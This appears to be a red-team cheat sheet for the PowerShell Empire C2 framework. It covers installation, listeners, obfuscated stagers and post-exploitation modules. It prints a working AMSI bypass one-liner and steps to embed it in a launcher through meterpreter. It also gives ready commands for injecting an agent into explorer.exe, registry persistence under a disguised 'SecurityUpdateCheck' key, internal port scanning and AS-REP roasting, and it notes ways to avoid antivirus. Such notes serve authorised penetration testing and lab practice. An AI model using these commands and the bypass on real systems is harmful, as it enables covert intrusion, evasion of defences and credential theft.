Powershell Empire

Overview

https://github.com/BC-SECURITY/Long-Live-The-Empire/blob/main/Long_Live_the_Empire_A_C2_Workshop_for_Modern_Red_Teaming.pdf

Install

Installing Empire
Non Kali OS

git clone --recursive https://github.com/BC-SECURITY/Empire.git
cd Empire
./setup/checkout-latest-tag.sh
sudo ./setup/install.sh

Kali OS

sudo apt install powershell-empire

Installing Starkiller
Once Empire is installed we can install the GUI for Empire known as Starkiller.

cd /opt

Download an up to date version of Starkiller from the BC-Security Github repo - https://github.com/BC-SECURITY/Starkiller/releases

chmod +x starkiller-0.0.0.AppImage

Starting Empire

Once both Empire and Starkiller are installed we can start both servers. Being by starting Empire with the instructions below.

cd /opt/Empire
./ps-empire server
./ps-empire client

Starting Starkiller
Once Empire is started follow the instructions below to start Starkiller.

cd /opt/Empire
./starkiller-0.0.0.AppImage

Default Credentials
Uri: 127.0.0.1:1337
User: empireadmin
Pass: password123

Delete Stale Listeners

If you exit empire without disabling or killing all your listeners next time you start empire it will still show and not let you disable or kill it
open this file in a database browser

/opt/Empire/empire/server/data/empire.db
#find the stale listener in the listeners table
DELETE FROM listeners WHERE id=1;

Server Obsfucation

Change Invoke-Empire to Invoke-RandomStringHere in these files:

empire/server/data/agent/agent.ps1
empire/server/data/agent/stagers/http/http.ps1

Listeners Overview

http - This is the standard listener that utilizes HTTP to listen on a specific port.
http_com - Uses the standard HTTP listener with an IE COM object.
http_foreign - Used to point to a different Empire server.
http_hop - Used for creating an external redirector using PHP.
http_mapi - Uses the standard HTTP listener with a MAPI COM object.
The next five commands all use variations of built out services or have unique features that make them different from other listeners.
meterpreter - Used to listen for Metasploit stagers.
onedrive - Utilizes OneDrive as the listening platform.
redirector - Used for creating pivots in a network.
dbx - Utilizes Dropbox as the listening platform.
http_malleable - Used alongside the malleable C2 profiles from BC-Security.

Creating a Listener

#select type
uselistener http
#required
set Name l0
set BindIP 10.10.15.49
set Host http://10.10.15.49
set Port 80

Configure your listener, the only two options you will need to change are the host IP and the host port.
HTTP listener
Name - Specify what name the listener shows up as in the listener menu.
Host - IP to connect back to.
Port - Port to listen on.
BindIP - IP to bind to (typically localhost / 0.0.0.0)
The following options can be useful for bypassing detection techniques and creating more complex listeners.

set DefaultDelay 30
set DefaultJitter 0.0-1.0 
set DefaultLostLimit 10 #Number of missed checkins before exiting

DefaultProfile - Will allow you to specify the profile used or User-Agent.
Headers - Since this is an HTTP listener it will specify HTTP headers.
Launcher - What launcher to use for the listener this will be prefixed on the stager.

Stagers Overview

The stager is similar to a payload or reverse-shell that you would send to the target to get an agent back.
Empire has multiple parts to each stage to help identify each one. First is the platform this can include multi, OSx, and Windows. Second the stager type itself / launcher.
multi/launcher - A fairly universal stager that can be used for a variety of devices.
windows/launcher_bat - Windows Batch file
multi/bash - Basic Bash Stager
You can also use stagers for more specific applications similar to the listeners. These can be anything from macro code to ducky code for USB attacks.
windows/ducky - Ducky script for the USB Rubber Ducky for physical USB attacks.
windows/hta - HTA server an HTML application protocol that can be used to evade AV.
osx/applescript - Stager in AppleScript: Apple's own programming language.
osx/teensy - Similar to the rubber ducky is a small form factor micro-controller for physical attacks.

Generating a Stager

usestager multi/launcher
set Obfuscate True
set Listener l0
set StagerRetries 10 
set OutFile check.ps1
set Language Powershell #bash or python
execute

Set the listener to the one you made in the previous task
The stager menu can come with various options depending on the stager selected as well as optional fields.
Base64 - Enable or disable stager encoding with base64.
SafeChecks - Enable or disable checks for the stager.
Some of the optional fields include ASMIBypass, Obfuscate, ETWBypass, etc.

Agents Overview

Agents are used within Starkiller similar to how you would interact with a normal shell or terminal.
Agents are color-coded and use icons to help distinguish Agent status. Below is an outline of the color and icon scheme
Red - User is no longer responding
Black - User is responding normally
User Icon - Normal user account
User Icon w/ Gear - System user account

Using Agents

Below you can see the basic layout of the Agent interaction menu and what capabilities an agent on a device has.

Module Overview

Modules are used in Empire as a way of packaging tools and exploits to be easily used with agents.
We can take a look at a few useful ones for enumeration and privilege escalation outlined below:

Seatbelt
Mimikatz 
WinPEAS

Empire sorts the modules by the language used: PowerShell, python, external, and exfiltration as well as categories for modules you can find the categories below.

code execution
collection
credentials
exfiltration
exploitation
lateral movement
management
persistence 
privesc
recon
situational awareness 
trollsploit

Using Modules

Modules require no, to very little configuration
Below you can see the task to run Seatbelt being assigned then the output of the module being printed to the console window.
Because all modules are run remotely from a task and agent this means that we do not have to worry about Anti-Virus or other possible detections.

Plugins Overview

Plugins are an extension of the base set of modules that Empire comes with. You can easily download and use community-made plugins to extend the use of Empire.
To use a plugin, transfer a plugin.py file to the /plugins directory of Empire. As an example of how to use plugins, we will be using the socks server plugin made by BC-Security, you can download it here.

Using Plugins

Transfer or clone the plugin that you want to use into the plugins directory for Empire.
After Empire version 3.4.0, Empire automatically loads plugins into the server. If the plugin is not already running you - Can use the plugin command to load the plugin for use.

plugin <plugin name>

You can run plugins using the start and stop commands. Depending on the plugin the flags / parameters can change for each.

start <plugin name>
stop <plugin name>

Great Modules for AD

usemodule powershell/situational_awareness/network/get_spn
set Search MSSQL*
execute

Get the SPNs from LDAP output or from bloodhound

Empire Agent Obfuscation / Meterpreter/Empire Tandem

This assumes an active meterpreter session on a remote host

make normal http listener (host/bind ip/port/name) are the main four. 
Now for the agent do:
set Launcher powershell -enc
usestager multi/launcher
set Bypasses None <-- we're adding the custom AMSI bypass
set Listener http 
generate

AMSI Bypass

$s = [Ref].Assembly.GetTypes();ForEach($b in $s) {if ($b.Name -like "*iUtils") {$c = $b}};$d = $c.GetFields('NonPublic,Static');ForEach($e in $d) {if ($e.Name -like "*Failed") {$f = $e}};$f.SetValue($null,$true);

copy the base64 encoded output, decode it locally. 
There will be the string:
If($PSVersionTable.PSVersion.Major -ge 3){};

put the AMSI bypass above in the {}
save as a .ps1 file locally on kali

go to meterpreter and run:
load powershell
powershell_import /path/to/file/created.ps1

Empire Internal Host Scanning

usemodule powershell/situational_awareness/network/portscan
set Hosts 10.10.120.20
set Ports 22,80,443,445,3389
set SkipDiscovery True
set PingOnly False
set ReadableOut scan.nmap
execute

Empire PSInject Agent into another process

// use explorer.exe 528 (for example)
set Agent <Current Empire Agent>
set Bypasses <up to you>
set Listener http
set ProcId 528
execute

Empire Registry Persistence

usemodule powershell/persistence/userland/registry
set Agent <AGENT_ID>
set Listener http
set KeyName SecurityUpdateCheck
set RegPath HKCU:Software\\Microsoft\\Windows\\CurrentVersion\\GameDVR\\SecurityDebugCheck
set Obfuscate True

Empire AS-REP Roast

usemodule rubeus
┌Record Options────────────────────────────────┬──────────┬────────────────────────────────────┐
│ Name    │ Value                              │ Required │ Description                        │
├─────────┼────────────────────────────────────┼──────────┼────────────────────────────────────┤
│ Agent   │ R5CT8N7S                           │ True     │ Agent to run module on.            │
├─────────┼────────────────────────────────────┼──────────┼────────────────────────────────────┤
│ Command │ asreproast                         │ False    │ Use available Rubeus commands as a │
│         │ /spn:ldap/dc01.rastalabs.local/ras │          │ one-liner.                         │
│         │ talabs.local                       │          │                                    │
└─────────┴────────────────────────────────────┴──────────┴────────────────────────────────────┘

PreviousSliver NextIronPython Empire

Last updated 2 years ago

Overview

Install

Starting Empire

Login to Starkiller

Delete Stale Listeners

Server Obsfucation

Listeners Overview

Creating a Listener

Stagers Overview

Generating a Stager

Agents Overview

Using Agents

Module Overview

Using Modules

Plugins Overview

Using Plugins

Great Modules for AD

Empire Agent Obfuscation / Meterpreter/Empire Tandem

Empire Internal Host Scanning

Empire PSInject Agent into another process

Empire Registry Persistence

Empire AS-REP Roast